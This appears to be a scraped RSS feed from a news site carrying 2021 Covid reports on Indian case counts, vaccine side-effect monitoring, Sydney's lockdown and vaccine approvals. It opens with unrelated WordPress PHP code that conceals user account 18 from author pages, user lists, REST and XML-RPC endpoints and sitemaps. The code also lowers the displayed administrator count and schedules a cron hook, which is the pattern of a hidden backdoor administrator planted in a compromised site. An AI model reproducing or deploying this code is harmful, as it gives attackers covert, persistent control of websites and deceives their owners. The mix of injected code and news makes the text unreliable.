add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say appeared first on The Edge Media.
]]>The post Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say appeared first on The Edge Media.
]]>The post 32,937 New Cases have been reported in India, including 417 deaths appeared first on The Edge Media.
]]>Across the country, 3,14,11,924 people have recovered, with 35,909 persons recuperating in the last 24 hours. The recovery rate is currently at 97.48 percent, the highest since March 2020, according to the health ministry.
According to the most recent figures, 54.58 crore vaccine doses have been distributed across the country, with 1743114 doses administered in the last 24 hours.
The post 32,937 New Cases have been reported in India, including 417 deaths appeared first on The Edge Media.
]]>The post 60 cases of Post-Covid shot complication reported : Central Panel. appeared first on The Edge Media.
]]>55 of 60 cases reported this time were found to have a consistent causal association to vaccination . Of these , 36 were anxiety-related reactions and 18 were product-related , while one was categorised as both.
The National Adverse Events following Immunization (AEFI) Committee , which conducts causality assessment of AEFIs for COVID-19 , completed its assessment on May 27.
It has submitted its report to the Union Health Ministry.
The AEFIs June report included one death of a fully vaccinated person. It was labelled “Vaccine product-related reaction” or anaphylaxis.
The post 60 cases of Post-Covid shot complication reported : Central Panel. appeared first on The Edge Media.
]]>The post Sydney Tightens lockdown as Australia’s Covid cases rise appeared first on The Edge Media.
]]>111 new cases were recorded in 24 hours in the Sydney western suburbs , the worst affected area where thousands of people are banned from leaving the immediate neighbourhood.
The state also recorded an additional death from the virus , taking the total to three since the start of the year and the national total to 913 since the pandemic began.
More than 1,000 people in the city surrounding the district have since tested positive.
“We are chasing our tail in terms of the cases,” state Chief Health Officer Kerry Chant said at the news conference.
The post Sydney Tightens lockdown as Australia’s Covid cases rise appeared first on The Edge Media.
]]>The post No application received for covishield authorisation, says EMA. appeared first on The Edge Media.
]]>“For the COVID-19 vaccine Covishield to be evaluated for use in the EU, the developer needs to submit a formal marketing authorisation application to EMA, which to date has not been received,” the EMA said at a press meeting.
Covishield vaccine, manufactured under technology transfer from Oxford/AstraZeneca, is not among the authorised vaccines under the EMA.
Covishield has also been excluded despite holding an EUL , this means people with Covishield will be subject to quarantine protocol in several countries.
The post No application received for covishield authorisation, says EMA. appeared first on The Edge Media.
]]>The post China to pump in more vaccines as Sri Lanka widens coverage. appeared first on The Edge Media.
]]>The move takes the total vaccines gifted by China to Sri Lanka to 2.7 million doses. Additionally , Srilanka has procured 6 million from china so far.
Another 2 million procured doses are scheduled to arrive during the third week of July, while Colomba plans to purchase a further two million in the last week of July, a spokesman of chinese Embassy said.
The post China to pump in more vaccines as Sri Lanka widens coverage. appeared first on The Edge Media.
]]>The post PM Modi expresses concerns over people neglecting masks and crowding in hill stations. appeared first on The Edge Media.
]]>“People are taking predictions about the third wave like weather prediction reports, very casually. The third wave predictions have to be taken very seriously,” said a senior official of the health ministry during this evening’s official briefing.
“If we remain cautious and take precautions , we will be able to prevent the third wave …there should be no compromise in this , ” said Prime minister Modi, while also stressing that the vaccination drive needs to be continuously ramped up.
The post PM Modi expresses concerns over people neglecting masks and crowding in hill stations. appeared first on The Edge Media.
]]>The post Zydus Covid vaccine for kids above 12 to come up for approval this week. appeared first on The Edge Media.
]]>The regulator’s subject expert committee (SEC) will examine data submitted by Cadila.
The vaccine has been tested on adults as well as children above 12 and if the regulatory committee is satisfied with the submitted data and documents, the vaccine will be approved for emergency use soon, officials said. An approval can hasten the opening of schools although vaccine supply will remain a concern.
If the SEC finds the phase 3 data submitted by the company satisfactory, the emergency use authorization for the vaccine can be granted this week itself.
The post Zydus Covid vaccine for kids above 12 to come up for approval this week. appeared first on The Edge Media.
]]>The post Pimpri-Chinchwad: After two months, Covid-19 cases fall 1000-mark; Major credits weekend lockdown appeared first on The Edge Media.
]]>The industrial city registered fewer cases this week compared to the previous eight weeks, health officials said. The positivity rate which had shot up to 40 per cent in March-April has also come down to around 12 per cent.
On Saturday, the industrial city registered 959 cases. It was on March 16, Pimpri-Chinchwad had registered 894 positive cases but immediately the next day, the cases crossed the 1000-mark. On March 17, 1,248 positive cases were registered. After this, there was a surge in cases, with infections even crossing the 3000-mark.
The post Pimpri-Chinchwad: After two months, Covid-19 cases fall 1000-mark; Major credits weekend lockdown appeared first on The Edge Media.
]]>The post Covid vaccine: Extend side-effects monitoring to 28 days, top officials says appeared first on The Edge Media.
]]>Dr NK Arora, member of the national AEFI Adverse Events Following Immunisation (AEFI) committee, said with more vaccines set to enter the market, monitoring for side-effects should be enhanced. He said that all AEFI data will soon be up on a public portal, a move many health experts have been calling for.
Dr Arora said out of seven crore vaccine recipients assessed so far, less than 0.5% cases have involved serious AEFIs. “We have submitted detailed analyses to the government. The data should be out soon,” he said. He said that longer monitoring durations is essential and has been the norm in many countries.
“All states should now direct local authorities to develop a mechanism that will allow recipients to report side-effects for 28 days. This system should record such events — from public and private facilities — and update them on the CoWIN website,” he said. Many health experts have called for the release of AEFI data. They said that publicly available information on side-effects can help reduce vaccine hesitancy. All the Covid-19 vaccines are new and experts said extensive follow-ups are needed with recipients to look for unusual adverse events.
The post Covid vaccine: Extend side-effects monitoring to 28 days, top officials says appeared first on The Edge Media.
]]>